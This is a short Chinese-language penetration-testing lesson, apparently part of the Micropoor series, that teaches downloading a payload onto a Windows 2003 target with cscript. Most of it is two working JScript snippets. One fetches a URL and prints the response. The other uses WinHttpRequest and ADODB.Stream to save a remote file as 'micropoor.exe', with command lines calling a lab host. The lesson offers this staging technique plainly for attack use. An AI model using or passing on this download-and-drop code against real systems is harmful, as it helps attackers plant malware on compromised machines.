第四十三课:js一句话下载payload

释放双眼,带上耳机,听听看~!

windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。

靶机:windows 2003

读取:

C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
null

附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

写入:

C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
null

附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;

BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

后者的话:简单,易用,轻便。

Micropoor

人已赞赏
安全教程

第四十二课:攻击FTP服务

2019-11-9 15:52:28

安全教程

第四十四课:ertutil一句话下载payload补充

2019-11-9 15:53:37

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索